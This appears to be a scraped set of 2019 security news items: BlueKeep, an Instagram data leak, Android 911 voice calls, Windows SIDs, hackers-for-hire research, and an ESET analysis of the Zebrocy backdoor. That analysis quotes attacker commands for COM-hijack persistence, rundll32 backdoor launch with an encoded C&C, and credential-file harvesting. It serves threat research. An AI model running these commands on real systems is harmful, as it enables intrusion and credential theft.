Patch now! Why the BlueKeep vulnerability is a big deal

What you need to know about the critical security hole that could enable the next WannaCryptor

Remember the panic that hit organizations around the world on May 12th, 2017 when machine after machine displayed the WannaCryptor ransom screen? Well, we might have a similar incident on our hands in the coming days, weeks or months if companies don’t update or otherwise protect their older Windows systems right away. The reason is BlueKeep, a ‘wormable’ critical Remote Code Execution (RCE) vulnerability in Remote Desktop Services that could soon become the new go-to vector for spreading malware. A patch by Microsoft for supported, as well as some unsupported, operating systems has been available since May 14th.

The BlueKeep vulnerability was found in Remote Desktop Services (also known as Terminal Services). If successfully exploited in the future, it could enable access to the targeted computer via a backdoor with no credentials or user interaction needed.

To make the bad news even worse, the vulnerability is ‘wormable’. This means that future exploits might use it to spread malware within or outside of networks in similar ways to what was seen with WannaCryptor.

Following Microsoft’s release of these latest patches, security researchers were able to create several working proofs-of-concept, but at the time of writing, none of these have been publicly released and there are no known cases of the flaw being exploited in the wild.

The flaw, listed as CVE-2019-0708, affects multiple in-support and out-of-support versions of Microsoft’s operating systems. Users of Windows 7, Windows Server 2008 R2, and Windows Server 2008 with automatic updates enabled are protected. Microsoft also issued special updates for two non-supported versions – namely Windows XP and Windows 2003 – which are available via this site. Windows 8 and Windows 10 are not affected by the vulnerability.

Microsoft has not released patches for Windows Vista, despite this version also being affected by the vulnerability. The only solution here is to disable Remote Desktop Protocol (RDP) completely or only allow its use when accessed via VPN.

It is important to note that any company using misconfigured RDP over the internet is putting its users and resources at risk. Apart from vulnerabilities such as BlueKeep, attackers also try to brute force their way into company machines and internal systems.

The BlueKeep case bears a strong resemblance to the events from two years ago. On March 14th, 2017, Microsoft released fixes for a wormable vulnerability in the Server Message Block (SMB) protocol, advising all users to patch their Windows machines immediately.

The reason for this was the EternalBlue exploit – a malicious tool allegedly designed by and stolen from the National Security Agency (NSA) – which targeted the SMB loophole. A month later, EternalBlue leaked online and in a few weeks became the vehicle for the two most damaging cyberattacks in recent history – WannaCry(ptor) and NotPetya (Diskcoder.C).

A similar scenario might unfold with BlueKeep given its wormable nature. Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator.

BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.

To sum it up, organizations and users are advised to:

Patch, patch, patch. If you or your organization run a supported version of Windows, update it to the latest version. If possible, enable automatic updates. If you are still using unsupported Windows XP or Windows 2003 – for whatever reason – download and apply the patches as soon as possible. Disable Remote Desktop Protocol. Despite RDP itself not being vulnerable, Microsoft advises organization to disable it until the latest patches have been applied. Further, to minimize your attack surface, RDP should only be enabled on devices where it really is used and needed. Configure RDP properly. If your organization absolutely must use RDP, avoid exposing it to the public internet. Only devices on the LAN, or accessing via a VPN, should be able to establish a remote session. Another option is to filter RDP access using firewall, whitelisting only a specific IP range. If this is not possible, use multi-factor authentication. Enable Network Level Authentication (NLA). BlueKeep can be partially mitigated by having NLA enabled, as it requires the user to authenticate before a remote session is established and the flaw can be misused. However, as Microsoft adds, “affected systems are still vulnerable to Remote Code Execution (RCE) exploitation if the attacker has valid credentials that can be used to successfully authenticate.” Use a reliable multi-layered security solution that can detect and mitigate the attacks exploiting the flaw on the network level. 22 May 2019 – 07:41PM

Cache of 49 million Instagram records found online

by

A security researcher has discovered a massive cache of data for millions of Instagram accounts, publicly accessible for everyone to see. The account included sensitive information that would be useful to cyberstalkers, among others.

A security researcher calling themselves anurag sen on Twitter discovered the database hosted on Amazon Web Services. It had over 49 million records when discovered and was still growing before it was deleted.

The Instagram data included user bios, profile pictures, follower numbers and location. This information is viewable online. What’s more puzzling is that it also contained the email address and telephone number used to set up the accounts, according to Techcrunch, which broke the story.

Reporters identified the owner of the database as Mumbai-based social media company Chtrbox. It pays social media influencers to publish sponsored content through their accounts. The database has since disappeared from Amazon.

Response from Chatrbox

Chatrbox took issue with press coverage of the leaked records, sending Naked Security the following statement:

The reports on a leak of private data are inaccurate. A particular database for limited influencers was inadvertently exposed for approximately 72 hours. This database did not include any sensitive personal data and only contained information available from the public domain, or self reported by influencers.

We would also like to affirm that no personal data has been sourced through unethical means by Chtrbox. Our database is for internal research use only, we have never sold individual data or our database, and we have never purchased hacked-data resulting from social media platform breaches. Our use of our database is limited to help our team connect with the right influencers to support influencers to monetize their online presence, and help brands create great content.

How might someone compile a massive database of Instagram information?

The company wouldn’t answer any more questions, so it’s difficult to know for sure. User names, profile shots, and follower numbers are publicly available and could be gathered by screen scraping. Screen scrapers use automated scripts to visit websites and copy the information they find there.

Companies use scraped data for all kinds of purposes, such as price comparisons and sentiment analysis. It’s considered malicious and many publishers try to block it because the scrapers are using their proprietary data and also draining their server resources.

We’ve seen people scraping Instagram before. Redditors attempted to archive every image from the site that they could, for kicks.

But it can get you into trouble. Authorities in Nova Scotia, Canada arrested a 19-year-old for scraping around 7,000 freedom-of-information releases from a public web site there, calling him a hacker. They subsequently dropped the charges.

What isn’t typically public is the phone number and email address used to create the account, and which TechCrunch says was included with some records. Facebook used to make this available via the Instagram API, even for accounts that didn’t publicly list that information. It had to turn off that feature in September 2017 after it found people downloading celebrity contact details.

Cache of 49 million Instagram records found online

by

A security researcher has discovered a massive cache of data for millions of Instagram accounts, publicly accessible for everyone to see. The account included sensitive information that would be useful to cyberstalkers, among others.

A security researcher calling themselves anurag sen on Twitter discovered the database hosted on Amazon Web Services. It had over 49 million records when discovered and was still growing before it was deleted.

The Instagram data included user bios, profile pictures, follower numbers and location. This information is viewable online. What’s more puzzling is that it also contained the email address and telephone number used to set up the accounts, according to Techcrunch, which broke the story.

Reporters identified the owner of the database as Mumbai-based social media company Chtrbox. It pays social media influencers to publish sponsored content through their accounts. The database has since disappeared from Amazon.

Response from Chatrbox

Chatrbox took issue with press coverage of the leaked records, sending Naked Security the following statement:

The reports on a leak of private data are inaccurate. A particular database for limited influencers was inadvertently exposed for approximately 72 hours. This database did not include any sensitive personal data and only contained information available from the public domain, or self reported by influencers.

We would also like to affirm that no personal data has been sourced through unethical means by Chtrbox. Our database is for internal research use only, we have never sold individual data or our database, and we have never purchased hacked-data resulting from social media platform breaches. Our use of our database is limited to help our team connect with the right influencers to support influencers to monetize their online presence, and help brands create great content.

How might someone compile a massive database of Instagram information?

The company wouldn’t answer any more questions, so it’s difficult to know for sure. User names, profile shots, and follower numbers are publicly available and could be gathered by screen scraping. Screen scrapers use automated scripts to visit websites and copy the information they find there.

Companies use scraped data for all kinds of purposes, such as price comparisons and sentiment analysis. It’s considered malicious and many publishers try to block it because the scrapers are using their proprietary data and also draining their server resources.

We’ve seen people scraping Instagram before. Redditors attempted to archive every image from the site that they could, for kicks.

But it can get you into trouble. Authorities in Nova Scotia, Canada arrested a 19-year-old for scraping around 7,000 freedom-of-information releases from a public web site there, calling him a hacker. They subsequently dropped the charges.

What isn’t typically public is the phone number and email address used to create the account, and which TechCrunch says was included with some records. Facebook used to make this available via the Instagram API, even for accounts that didn’t publicly list that information. It had to turn off that feature in September 2017 after it found people downloading celebrity contact details.

Some Androids don’t call 911 when you tell them to call an ambulance

by

Somebody’s not breathing. You panic, you grab your phone, and you call for an ambulance.

Or do you?

Unfortunately, if you’re using an Android phone, you might not be. You could instead be calling for, say, medical transportation that isn’t authorized to respond to emergencies.

As the Idaho Statesmen reported recently, Android users who use voice commands may tell their smartphones to “call an ambulance” but that phrase doesn’t trigger all Androids to dial the US emergency number of 911. The newspaper didn’t specify which Android models fail to dial 911.

Tell Siri, however, to call an ambulance, and the voice assistant will dial 911. That’s a relief. But when some Android phones are given that voice command, they instead pull up a list of ambulance companies. Alternatively, they may respond with a Google search that returns, say, a blog post on when it’s appropriate to call an ambulance, the Statesman reports.

Dispatchers for Injury Care EMS – a Boise, Idaho-based company that transports patients in its ambulances, including, for example, from hospitals to nursing homes – told the news outlet that they’ve been getting a steady trickle of calls that were meant to go to 911.

The reason for that may well be that Injury Care EMS is the first company that appears in a Google list of ambulance companies in the Boise area. Injury Care EMS owner Dr. Richard Radnovich and his dispatchers told the Statesman that they’re getting the misplaced calls several times a week.

Rich Wright, an EMT student and the community liaison for Injury Care, told the Statesman that one such recent call was from a mother whose son drank too much. She was trying to get paramedics to help him out, he said:

It was a mom who was panicked, and she was trying to do the best she could to get an ambulance to her son, and we just happened to be the company that her phone had dialed.

Dispatchers are telling such callers that they need to hang up and dial 911, but even the few seconds it takes to tell them that, and for the callers to hang up and call the right number, eats up precious time during an emergency. It takes up even more time if the caller is confused and the dispatcher needs to explain it more thoroughly.

Life-saver Siri

We’ve seen multiple instances of Siri being used to call emergency services and then being credited for saving people’s lives, all because precious time was saved when getting medical attention to people in need.

There was one such case in 2017, when a 4-year-old saved his mother’s life by telling Siri to please dial 999 – the British emergency services number – to “save Mummy’s life.”

A year before that, an Australian mother, rushing to the nursery when a baby monitor showed her 1-year-old had stopped breathing, dropped her phone while she was turning on the light. She still managed to tell Siri to call for help while she performed CPR. Both she and her husband credited the few precious seconds that Siri gave them for potentially making all the difference.

The outcome of that particular story is one of the upsides of the fact that then-recent iPhones picked up the ability to always be listening for commands. That feature came about in iOS 9, when Apple enabled activation of the built-in personal assistant at the sound of your voice, rather than waiting for you to hold down the Home button.

A question of public safety

Those are some of the ways in which Siri has been credited with saving lives. Google’s voice assistant? Not so much. At least, it hasn’t featured in headlines about saving mummies or babies, though that certainly doesn’t mean it hasn’t happened.

At any rate, Radnovich reached out to the Statesman because he sees the issue as a question of public safety. He also reached out to Google, but neither he nor the newspaper got much satisfaction out of the company.

From an email sent by a Google spokeswoman to the Statesman:

The supported query for the Google Assistant is ‘Hey Google, call 911.’ This will trigger the Assistant to call 911. Asking the Assistant to ‘call an ambulance’ is not currently supported and we don’t encourage use of that voice command.

OK… so, can’t Google just, like, rewrite the code so that the “call an ambulance” voice command triggers a call to 911, as Wright suggests?

Sorry, Google, but your failure to do so does not compute.

Android users, we can’t tell you which models call 911 when you ask for an ambulance or which don’t. So in lieu of Google changing things around so that the voice command triggers a 911 call, please do try to remember that in the US, it’s safest to dial 911, or tell Google voice assistant to dial 911, not an ambulance.

Heaven knows what you’ll get if you don’t.

Some Androids don’t call 911 when you tell them to call an ambulance

by

Somebody’s not breathing. You panic, you grab your phone, and you call for an ambulance.

Or do you?

Unfortunately, if you’re using an Android phone, you might not be. You could instead be calling for, say, medical transportation that isn’t authorized to respond to emergencies.

As the Idaho Statesmen reported recently, Android users who use voice commands may tell their smartphones to “call an ambulance” but that phrase doesn’t trigger all Androids to dial the US emergency number of 911. The newspaper didn’t specify which Android models fail to dial 911.

Tell Siri, however, to call an ambulance, and the voice assistant will dial 911. That’s a relief. But when some Android phones are given that voice command, they instead pull up a list of ambulance companies. Alternatively, they may respond with a Google search that returns, say, a blog post on when it’s appropriate to call an ambulance, the Statesman reports.

Dispatchers for Injury Care EMS – a Boise, Idaho-based company that transports patients in its ambulances, including, for example, from hospitals to nursing homes – told the news outlet that they’ve been getting a steady trickle of calls that were meant to go to 911.

The reason for that may well be that Injury Care EMS is the first company that appears in a Google list of ambulance companies in the Boise area. Injury Care EMS owner Dr. Richard Radnovich and his dispatchers told the Statesman that they’re getting the misplaced calls several times a week.

Rich Wright, an EMT student and the community liaison for Injury Care, told the Statesman that one such recent call was from a mother whose son drank too much. She was trying to get paramedics to help him out, he said:

It was a mom who was panicked, and she was trying to do the best she could to get an ambulance to her son, and we just happened to be the company that her phone had dialed.

Dispatchers are telling such callers that they need to hang up and dial 911, but even the few seconds it takes to tell them that, and for the callers to hang up and call the right number, eats up precious time during an emergency. It takes up even more time if the caller is confused and the dispatcher needs to explain it more thoroughly.

Life-saver Siri

We’ve seen multiple instances of Siri being used to call emergency services and then being credited for saving people’s lives, all because precious time was saved when getting medical attention to people in need.

There was one such case in 2017, when a 4-year-old saved his mother’s life by telling Siri to please dial 999 – the British emergency services number – to “save Mummy’s life.”

A year before that, an Australian mother, rushing to the nursery when a baby monitor showed her 1-year-old had stopped breathing, dropped her phone while she was turning on the light. She still managed to tell Siri to call for help while she performed CPR. Both she and her husband credited the few precious seconds that Siri gave them for potentially making all the difference.

The outcome of that particular story is one of the upsides of the fact that then-recent iPhones picked up the ability to always be listening for commands. That feature came about in iOS 9, when Apple enabled activation of the built-in personal assistant at the sound of your voice, rather than waiting for you to hold down the Home button.

A question of public safety

Those are some of the ways in which Siri has been credited with saving lives. Google’s voice assistant? Not so much. At least, it hasn’t featured in headlines about saving mummies or babies, though that certainly doesn’t mean it hasn’t happened.

At any rate, Radnovich reached out to the Statesman because he sees the issue as a question of public safety. He also reached out to Google, but neither he nor the newspaper got much satisfaction out of the company.

From an email sent by a Google spokeswoman to the Statesman:

The supported query for the Google Assistant is ‘Hey Google, call 911.’ This will trigger the Assistant to call 911. Asking the Assistant to ‘call an ambulance’ is not currently supported and we don’t encourage use of that voice command.

OK… so, can’t Google just, like, rewrite the code so that the “call an ambulance” voice command triggers a call to 911, as Wright suggests?

Sorry, Google, but your failure to do so does not compute.

Android users, we can’t tell you which models call 911 when you ask for an ambulance or which don’t. So in lieu of Google changing things around so that the voice command triggers a 911 call, please do try to remember that in the US, it’s safest to dial 911, or tell Google voice assistant to dial 911, not an ambulance.

Heaven knows what you’ll get if you don’t.

Don’t break Windows 10 by deleting SID, Microsoft warns

by

Windows account security identifiers (SIDS) were the subject of a warning issued by Microsoft for users and admins not to delete the sub-type in case they inadvertently break applications.

It’s not clear what prompted Microsoft to issue the caution for a type of SID that has been part of its OS since Windows 8 and Windows Server 2012, but the implication is that a lack of awareness has been causing support problems.

A bit like the Unix UID, SIDS are a fundamental part of the Windows system for identifying users, accounts, and groups and deciding whether one has permission to access the other.

If a Windows user (Alice, let’s say) sets up an account on her computer in her name, Windows identifies the account using a unique SID. Alice can change her account name as often as she wants (to AliceB or even Jeff), but the underlying SID that identifies it to Windows will always stay the same.

The 2012 overhaul expanded SIDS to cover things like file access, drive locations, access to certificates, cameras, removable storage etc. Each one became a ‘capability’ that a user or application could have, or not have, the rights to access.

According to Microsoft, Windows 10 1809 can use more than 300 of these, one of the most commonly encountered of which looks like this:

S-1-15-3-1024-1065365936-1281604716-3511738428-1654721687-432734479-3232135806-4053264122-3456934681

It’s not hard to see why this might confuse anyone who delves into their Registry using the editor (Start > Run > regedt32.exe) where it appears as ‘account unknown’ with full read access.

After research, it seems that this might be something Windows itself needs to restart after a reboot, a sort of global SID.

That means that anyone who deletes it without understanding this purpose could break Windows itself. As Microsoft’s warning states:

DO NOT DELETE capability SIDS from either the Registry or file system permissions. Removing a capability SID from file system permissions or registry permissions may cause a feature or application to function incorrectly. After you remove a capability SID, you cannot use the UI to add it back.

A further search reveals users asking support forums for advice on this SID, unaware that it is legitimate, plus examples where admins have deleted it and live to regret the decision.

‘Unfriendly’ names

So how do admins resolve which of these are legit SIDS and which might be suspicious?

Microsoft admits that capability IDs are not ‘friendly” (i.e. easy to understand) so using these on their own won’t be much help.  It even notes:

By design, a capability SID does not resolve to a friendly name.

The answer is that all capability SIDS should appear in the registry – Start > Run > regedt32.exe, and navigate to the following registry entry:

HKEY_LOCAL_MACHINESOFTWAREMicrosoftSecurityManagerCapabilityClassesAllCachedCapabilities.

If it doesn’t appear in this list then it warrants further investigation, bearing in mind that it might still be a legitimate third-party capability.

Most hackers for hire are scammers, research shows

by

Hackers for hire are a bunch of swindlers, according to research published last week by Google and academics from the University of California, San Diego.

The researchers were specifically interested in a segment of black-market services known as hackers for hire: the crooks you send in when you lack the hacking skills to do the job yourself and the morals that whisper in your ear that this is not a nice, or legal, thing to do.

Such services offer targeted attacks that remain a potent threat, the researchers said, due to the fact that they’re so tailored. Think of spearphishing or whaling attacks that are so convincing because they get all the details right, such as forging company invoices or setting up copycat log-in sites that steal account credentials.

That kind of thing takes effort. Fortunately, most hackers for hire aren’t up to the task, to say the least. Many were outright scams – not too surprising – and some wouldn’t even take on the job if it involved attacking Gmail. For those services that did agree to take on the challenge of hacking Gmail accounts, the cost ballooned over the course of two years, from $123 to $384 – with a peak of $461 in February 2018.

Yahoo hacking prices have tracked the same as Google, while Facebook and Instagram hacking prices have actually fallen to the current average of $307.

The researchers hypothesize that the price differences for hacking the various email providers and the change in pricing are likely driven by what they call both operational and economic factors: namely, Google and Yahoo have gotten better at protecting email accounts, while prices have increased as the market for a specific service shrinks:

Prices will naturally increase as the market for a specific service shrinks (reducing the ability to amortize sunk costs on back-end infrastructure for evading platform defenses) and also as specific services introduce more, or more effective, protection mechanisms that need to be bypassed (increasing the transactional cost for each hacking attempt).

Overall, hackers for hire are pleasingly incompetent… or frauds

What’s sure to keep people’s accounts secure is surely aggravating the weasels who want to pay somebody to take them over. Namely, the hijacking ecosystem is “far from mature,” the researchers concluded.

They tested it out by setting up bogus online buyer personas with which to approach 27 hacking-for-hire services. The researchers tasked those services with compromising particular victim accounts.

Those supposed “victims” were actually honeypot Gmail accounts operated in coordination with Google.

Only five of the services they contacted delivered on their promise to attack the supposed victims. The rest were scammers, demurred when it came to attacking Gmail accounts, or had lousy customer service, they said:

Just five of the services we contacted delivered on their promise to attack our victim personas. The others declined, saying they could not cover Gmail, or were outright scams. We frequently encountered poor customer service, slow responses, and inaccurate advertisements for pricing.

The other good news: U2F (Universal 2nd Factor) security keys are working, the researchers said:

Further, the current techniques for bypassing 2FA can be mitigated with the adoption of U2F security keys.

… we would be remiss were we not to mention that Google last week got U2F egg on its face when it had to recall its Titan Bluetooth U2F keys after finding a security flaw.

Google has argued that Titan keys are still more secure than relying on just a password for access, and true, an attacker has to to be within about 10 meters and has to launch their attack just as you press the button on your Titan key… and needs to know your username and password in advance.

So we’ll grant the researchers that point.

Sum it all up, and the researchers don’t think the hackers-for-hire market is a large-scale threat at this point:

We surmise from our findings, including evidence about the volume of real targets, that the commercial account hijacking market remains quite small and niche. With prices commonly in excess of $300, it does not yet threaten to make targeted attacks a mass market threat.

A journey to Zebrocy land

ESET sheds light on commands used by the favorite backdoor of the Sednit group

What happens when a victim is compromised by a backdoor and the operator is controlling it? It’s a difficult question that is not possible to answer entirely by reverse engineering the code. In this article we will analyze commands sent by the operator to their targets.

The Sednit group – also known as APT28, Fancy Bear, Sofacy or STRONTIUM – has been operating since at least 2004 and has made headlines frequently in past years.

Recently, we unveiled the existence of a UEFI rootkit, called LoJax, which we attribute to the Sednit group. This is a first for an APT group, and shows Sednit has access to very sophisticated tools to conduct its espionage operations.

Three years ago, the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia. Since then, the number and diversity of components has increased drastically. ESET researchers and colleagues from other companies have documented these components; however, in this article we will focus on what’s beyond the compromise, what the operators do once a victim system is running a Zebrocy Delphi backdoor.

At the end of August 2018, the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components. In the past, Sednit used a similar technique for credential phishing. However, it is unusual for the group to use this technique to deliver one of its malware components directly. Previously, it had used exploits to deliver and execute the first stage malware, while in this campaign the group relied entirely on social engineering to lure victims into running the first part of the chain. The screenshot in Figure 1 shows Bitly statistics for the shortened URL used in this campaign.

Figure 1. Statistics of the Bitly URL

About 20 clicks were recorded on this link in the same week that the URL was created, and these presumably downloaded the target archive. Let’s keep in mind that this may mean fewer than 20 potential victims, as victims may have clicked on the URL twice, or maybe even more times, because the outcome was not what they expected… as we will describe below.

While ESET telemetry data indicates that this URL was delivered by spearphishing emails, we don’t have a sample of such an email. The shortened URL leads the victim to an IP-address-based URL, where the archived payload is located.

Unfortunately, without the email message, we don’t know if there are any instructions for the user, if there is any further social engineering, or if it relies solely on the victim’s curiosity. The archive contains two files; the first is an executable file, while the second is a decoy PDF document.

Figure 2. Files extracted from the archive (Google Translate suggests “CATALOGUE – (2018).exe” and “Order 97.pdf” from the Ukrainian)

Note there is a typo in the executable’s filename; it should be “ДОВIДНИК” instead of “ДОВIДНIК”. Once the binary is executed, a password prompt dialog box opens. The result of the password validation will always be wrong, but after the apparent validation attempt, the decoy PDF document is opened. That document appears to be empty, but the downloader, which is written in Delphi, continues running in the background. The IP address is also used in the URL hardcoded into the first binary downloader.

The Stage-1 downloader will download and execute a new downloader, written in C++, not so different from other Zebrocy downloaders. Once again this downloader is as straightforward as the Zebrocy gang’s other downloaders. It creates an ID and it downloads a new, interesting backdoor, (this time) written in Delphi.

As we explained in our most recent blogpost about Zebrocy, the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded, encrypted blobs. These blobs contain the different parts of the configuration.

Figure 3. Overview of the resource section

Once the backdoor sends basic information about its newly compromised system, the operators take control of the backdoor and start to send commands right away.

Hence, the time between the victim running the downloader and the operators’ first commands is only a few minutes.

In this section we describe in more detail the commands performed manually by the operators through their Delphi backdoor.

The commands available are located in one of the configuration blobs mentioned earlier (the “commands” blob in Figure 3). The number of supported commands has increased over time, with the latest version of the backdoor having more than thirty. As we did not identify a pattern in the order which the commands are invoked, we believe the operators are executing them manually.

The first set of commands gathers information about the victim’s computer and environment:

Commands Arguments SCREENSHOT None SYS_INFO None GET_NETWORK None SCAN_ALL None

The commands above are commonly executed when the operators first connect to a newly activated backdoor. They don’t have any arguments, and they are quite self-explanatory. Other commands commonly seen executed shortly after these backdoors are activated, listed below:

Commands Arguments REG_GET_KEYS_VALUES HKEY_CURRENT_USER
SoftwareMicrosoftWindowsCurrentVersion DOWNLOAD_DAY(30) c:*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;
*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;

d:*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg;*.jpeg;
*.bmp;*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;*.lhz;

DOWNLOAD_DAY(1)
c:*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg
*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;

d:*.doc;*.docx;*.xls;*.xlsx;*.ppt;*.pptx;*.rtf;*.tif;*.tiff;*.jpg*.jpeg
*.bmp*.rar;*.zip;*.pdf;*.KUM;*.kum;*.tlg;*.TLG;*.sbx;*.crf;*.hse;*.hsf;

CMD_EXECUTE echo %APPDATA%
ipconfig /all
netstat -aon CMD_EXECUTE wmic process get Caption,ExecutablePath
reg query
“HKCUSoftwareMicrosoftWindowsCurrentVersionRun” /s

Those who already have read our previous articles about Zebrocy will notice that more or less the same kind of information is sent, over and over again by previous stages. This information is requested within a few minutes of initial compromise and the amount of data the operator will have to deal with is quite considerable.

In order to collect even more information, from time to time the Zebrocy operators upload and use dumpers on victims’ machines. The current dumpers have some similarities with those previously used by the group. In this case, Yandex Browser, Chromium, 7Star Browser (a Chromium-based browser), and CentBrowser are targeted, as well as versions of Microsoft Outlook from 1997 through 2016:

Command Arguments UPLOAD_AND_EXECUTE_FILE C:ProgramDataOfficeMSmsoffice.exe
[…]
4D5A9000…

These dumpers create log files indicating the presence or absence of potential databases to dump:

Command Arguments DOWNLOAD_LIST C:ProgramDataOfficeMSout.txt
C:ProgramDataOfficeMStext.txt

The current dumper contains the following output when there are no databases to dump:

%LOCALAPPDATA%YandexYandexBrowserUser DataDefaultLogin Data not found
%LOCALAPPDATA%ChromiumUser DataDefaultLogin Data not found
%LOCALAPPDATA%7Star7StarUser DataDefaultLogin Data not found
%LOCALAPPDATA%CentBrowserUser DataDefaultLogin Data not found

These dumpers are quickly removed once they have done their job. Moreover, the backdoor contains a list of filenames related to credentials from software listed below (database names):

key3.db Firefox private keys (now named key4.db) cert8.db Firefox certificate database logins.json Firefox encrypted password database account.cfn The Bat! (email client) account credentials wand.dat Opera password database

The operators take care of retrieving these databases if they are present on the victim’s computer.

Command Arguments
DOWNLOAD_LIST
%APPDATA%The Bat!Account.CFN
%APPDATA%The Bat![REDACTED]Account.CFN

The operators retrieve these files on the machine using the DOWNLOAD_LIST command. This command can be used when the operators are aware of the presence of interesting files on the computer.

Finally, depending on how interesting the victim is, they malware operators may deploy another custom backdoor. This backdoor is executed using the CMD_EXECUTE command:

Command Arguments CMD_EXECUTE

reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}” /ve /d “Reliability Maintenance Control Panel” /reg:64 /f&&reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}InProcServer32” /ve /d “%APPDATA%MicrosoftWinSupportRMCmtrcpl.dll” /reg:64 /f&&reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}InProcServer32” /v “ThreadingModel” /t REG_SZ /d “Both” /reg:64 /f rundll32.exe “%APPDATA%MicrosoftWinSupportRMCmtrcpl.dll”,#1 687474703A2F2F[REDACTED] dir /s /b /o:gn %APPDATA%Microsoft

reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}” /ve /d “Reliability Maintenance Control Panel” /reg:64 /f&&reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}InProcServer32” /ve /d “%APPDATA%MicrosoftWinSupportRMCmtrcpl.dll” /reg:64 /f&&reg add “HKCUSoftwareClassesCLSID{0CD069CF-AC9B-41F4-9571-3A95A62C36A1}InProcServer32” /v “ThreadingModel” /t REG_SZ /d “Both” /reg:64 /f

rundll32.exe “%APPDATA%MicrosoftWinSupportRMCmtrcpl.dll”,#1 687474703A2F2F[REDACTED]

dir /s /b /o:gn %APPDATA%Microsoft

There are some interesting facts here. First, they use COM object hijacking to make the malware persistent on the system even though the custom backdoor is installed only for a few hours. Second, the hex-encoded string is the C&C used by the custom backdoor while in the Delphi backdoor the C&C is embedded in the configuration.

The two Delphi backdoors, the common one and the one above, are quite similar but contain these interesting tweaks:

  Delphi backdoor Downloaded Delphi backdoor Delphi compiler version 14.0-15.0 32.0 32/64-bit 32-bit 64-bit Configuration location resource section no config (C&C is passed as an argument) Number of commands 5 3 Encryption algorithm AES ECB custom Lifetime on the computer a few days a few hours

Once again, it’s not very clear what the purpose of this custom backdoor is. The detection ratio is definitely lower in comparison to the “usual” backdoor. The very short timeframe where this backdoor is on the system and operating makes it harder to retrieve. Once its operators complete their evil deeds, they quickly remove it.

Observing commands used in the wild by the operator is quite interesting. They are gathering a considerable amount of information on the compromised target and they are not worried about duplicated data. It shows a large gap between the development strategy and what operators do in practice. Backdoors with custom configuration and modules are deployed very carefully, which indicates some precautions to avoid ending up in the hands of researchers.

The first set of commands is the same and executed during a very short timeframe, which raises another question: is it automated?

Distribution URL http://45.124.132[.]127/DOVIDNIK – (2018).zip C&C server http://45.124.132[.]127/action-center/centerforserviceandaction/service-and-action.php SHA-1 ESET detection names 48f8b152b86bed027b9152725505fbf4a24a39fd Win32/TrojanDownloader.Sednit.CMT 1e9f40ef81176190e1ed9a0659473b2226c53f57 Win32/HackTool.PSWDump.D bfa26857575c49abb129aac87207f03f2b062e07 Win32/PSW.Agent.OGE Tactic ID Name Description Initial Access T1192 Spearphishing Link Spearphishing emails using a URL-shortener service to trick the victim into clicking on a link to a zip file containing malicious files. Execution T1204 User Execution Tricks users into running an executable with an icon that looks like a Microsoft Word document. T1085 Rundll32 rundll32.exe has been used to run a new, downloaded, malicious DLL. T1047 Windows Management Instrumentation WMI commands to gather victim host details. T1053 Scheduled Task Schedule task to execute malicious binaries. Persistence T1060 Registry Run Keys / Startup Folder Registry key HKCUSoftwareMicrosoftCurrentVersionRun used for persistence. T1122 Component Object Model Hijacking COM hijacking for persistence. Defense Evasion T1107 File Deletion Deletes files (binaries and files created) after usage. T1089 Disabling Security Tools Kills processes Discovery T1012 Query Registry Registry keys enumeration T1057 Process Discovery Lists running processes T1082 System Information Discovery Uses systeminfo command to gather information about the victim. T1083 File and Directory Discovery Uses echo ENV command to list the content of a directory. Collection T1005 Data from Local System Scans files that match extensions listed in the malware. T1039 Data from Network Shared Drive Enumerates remote and local drives and then exfiltrates files matching specific extensions. T1025 Data from Removable Media Enumerates remote and local drives and then exfiltrates files matching specific extensions. T1074 Data Staged Creates file containing path of all files to exfiltrate. T1056 Input Capture Keylogger feature. T1113 Screen Capture Screenshot feature. Exfiltration T1020 Automated Exfiltration Automatically prepare a file with all file paths to retrieve and send it. T1022 Data Encrypted Data sent are hex-encoded, encrypted with a known algorithm or a custom one. T1041 Exfiltration Over Command and Control Channel Data are exfiltrated to a C&C server. Command And Control T1043 Commonly Used Port Downloaders and backdoors use ports 80 or 443 to communicate with the C&C server. T1024 Custom Cryptographic Protocol Data sent are hex encoded, encrypted with AES or a custom algorithm. T1132 Data Encoding Data sent are hex-encoded, encrypted with a known algorithm or a custom one. T1001 Data Obfuscation Data sent are hex-encoded, encrypted with a known algorithm or a custom one. T1008 Fallback Channels A fallback C&C server is embedded in the configuration. T1079 Multilayer Encryption Data sent are hex-encoded, encrypted with a known algorithm or a custom one. T1071 Standard Application Layer Protocol HTTP, HTTPS are used to communicate. T1032 Standard Cryptographic Protocol Data sent are hex-encoded, encrypted with a known algorithm or a custom one. 22 May 2019 – 11:30AM

Secure Your Home Wi-Fi Router

Several years ago, creating a cybersecure home was simple; most homes consisted of nothing more than a wireless network and several computers. Today, technology has become far more complex and is integrated into every part of our lives, from mobile devices and gaming consoles to your home thermostat and your refrigerator. Here are four simple steps for creating a cybersecure home.

Your Wireless Network

